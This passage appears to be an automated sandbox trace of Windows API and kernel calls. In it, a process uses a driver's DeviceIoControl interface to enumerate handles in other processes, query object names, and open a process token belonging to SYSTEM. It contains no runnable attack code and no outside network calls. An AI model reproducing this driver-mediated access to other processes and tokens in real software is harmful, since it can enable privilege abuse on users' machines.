hHeap=0x320000) returned 1 [0225.256] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.256] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.256] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.256] PsAcquireProcessExitSynchronization () returned 0x0 [0225.256] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.256] ObReferenceObjectByHandle (in: Handle=0x130c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001943740, HandleInformation=0x0) returned 0x0 [0225.256] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.256] PsReleaseProcessExitSynchronization () returned 0x2 [0225.256] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.256] ObQueryNameString (in: Object=0xfffff8a001943740, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.256] ObfDereferenceObject (Object=0xfffff8a001943740) returned 0x1 [0225.256] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.256] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.256] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.256] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.256] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.256] PsAcquireProcessExitSynchronization () returned 0x0 [0225.256] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.256] ObReferenceObjectByHandle (in: Handle=0x1318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0225.256] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.256] PsReleaseProcessExitSynchronization () returned 0x2 [0225.256] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.256] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.257] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0225.257] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.257] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.257] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.257] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.257] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.257] PsAcquireProcessExitSynchronization () returned 0x0 [0225.257] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.257] ObReferenceObjectByHandle (in: Handle=0x132c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0225.257] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.257] PsReleaseProcessExitSynchronization () returned 0x2 [0225.257] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.257] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.257] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0225.257] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.257] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.257] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.257] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.258] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.258] PsAcquireProcessExitSynchronization () returned 0x0 [0225.258] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.258] ObReferenceObjectByHandle (in: Handle=0x1344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0225.258] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.258] PsReleaseProcessExitSynchronization () returned 0x2 [0225.258] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.258] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.258] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0225.258] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.258] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.258] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.258] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0225.258] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.258] PsAcquireProcessExitSynchronization () returned 0x0 [0225.258] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.258] ObReferenceObjectByHandle (in: Handle=0x135c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019266a0, HandleInformation=0x0) returned 0x0 [0225.258] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.258] PsReleaseProcessExitSynchronization () returned 0x2 [0225.258] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.258] ObQueryNameString (in: Object=0xfffff8a0019266a0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.258] ObfDereferenceObject (Object=0xfffff8a0019266a0) returned 0x2 [0225.258] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.259] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.259] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.259] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0225.259] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.259] PsAcquireProcessExitSynchronization () returned 0x0 [0225.259] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.259] ObReferenceObjectByHandle (in: Handle=0x1364, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800209e600, HandleInformation=0x0) returned 0x0 [0225.259] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.259] PsReleaseProcessExitSynchronization () returned 0x2 [0225.259] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.259] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.259] ObfDereferenceObject (Object=0xfffffa800209e600) returned 0x11 [0225.259] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.259] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.259] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.259] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0225.260] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.260] PsAcquireProcessExitSynchronization () returned 0x0 [0225.260] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.260] ObReferenceObjectByHandle (in: Handle=0x1368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019277c0, HandleInformation=0x0) returned 0x0 [0225.260] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.260] PsReleaseProcessExitSynchronization () returned 0x2 [0225.260] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.260] ObQueryNameString (in: Object=0xfffff8a0019277c0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.260] ObfDereferenceObject (Object=0xfffff8a0019277c0) returned 0x2 [0225.260] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.260] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.260] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.260] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0225.260] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.260] PsAcquireProcessExitSynchronization () returned 0x0 [0225.260] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.260] ObReferenceObjectByHandle (in: Handle=0x1370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800218e960, HandleInformation=0x0) returned 0x0 [0225.260] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.260] PsReleaseProcessExitSynchronization () returned 0x2 [0225.261] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.261] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.261] ObfDereferenceObject (Object=0xfffffa800218e960) returned 0x1 [0225.261] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.261] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.261] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.261] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0225.261] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.261] PsAcquireProcessExitSynchronization () returned 0x0 [0225.261] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.261] ObReferenceObjectByHandle (in: Handle=0x1374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001abf190, HandleInformation=0x0) returned 0x0 [0225.261] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.261] PsReleaseProcessExitSynchronization () returned 0x2 [0225.261] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.262] ObQueryNameString (in: Object=0xfffff8a001abf190, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.262] ObfDereferenceObject (Object=0xfffff8a001abf190) returned 0x2 [0225.467] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.467] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.467] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.467] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x11c, lpOverlapped=0x0) returned 1 [0225.467] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.467] PsAcquireProcessExitSynchronization () returned 0x0 [0225.467] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.467] ObReferenceObjectByHandle (in: Handle=0x1380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002806070, HandleInformation=0x0) returned 0x0 [0225.467] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.468] PsReleaseProcessExitSynchronization () returned 0x2 [0225.468] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.468] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.468] ObfDereferenceObject (Object=0xfffffa8002806070) returned 0x1 [0225.468] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.468] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.468] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x138, lpOverlapped=0x0) returned 1 [0225.468] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.468] PsAcquireProcessExitSynchronization () returned 0x0 [0225.468] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.468] ObReferenceObjectByHandle (in: Handle=0x1384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001aebe00, HandleInformation=0x0) returned 0x0 [0225.468] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.468] PsReleaseProcessExitSynchronization () returned 0x2 [0225.468] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.468] ObQueryNameString (in: Object=0xfffff8a001aebe00, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.468] ObfDereferenceObject (Object=0xfffff8a001aebe00) returned 0x2 [0225.468] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.468] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x47c) returned 0xc8 [0225.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.468] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003755060, HandleInformation=0x0) returned 0x0 [0225.468] ObOpenObjectByPointer (in: Object=0xfffffa8003755060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.468] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x42 [0225.468] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.469] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.469] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.469] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.469] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.470] CloseHandle (hObject=0xc4) returned 1 [0225.470] CloseHandle (hObject=0xc8) returned 1 [0225.470] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0225.471] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.471] PsAcquireProcessExitSynchronization () returned 0x0 [0225.471] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0) [0225.471] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003780230, HandleInformation=0x0) returned 0x0 [0225.471] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.471] PsReleaseProcessExitSynchronization () returned 0x2 [0225.471] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0225.471] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.471] ObfDereferenceObject (Object=0xfffffa8003780230) returned 0x1 [0225.471] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.471] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.471] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.471] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.471] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.471] PsAcquireProcessExitSynchronization () returned 0x0 [0225.471] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0) [0225.471] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037be070, HandleInformation=0x0) returned 0x0 [0225.471] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.471] PsReleaseProcessExitSynchronization () returned 0x2 [0225.471] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0225.471] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.471] ObfDereferenceObject (Object=0xfffffa80037be070) returned 0x1 [0225.471] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.471] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.472] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.472] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.472] PsAcquireProcessExitSynchronization () returned 0x0 [0225.472] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880052b35d0) [0225.472] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80023549d0, HandleInformation=0x0) returned 0x0 [0225.472] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.472] PsReleaseProcessExitSynchronization () returned 0x2 [0225.472] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0225.472] ObQueryNameString (in: Object=0xfffffa80023549d0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.472] ObfDereferenceObject (Object=0xfffffa80023549d0) returned 0x1 [0225.472] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.472] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0225.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, 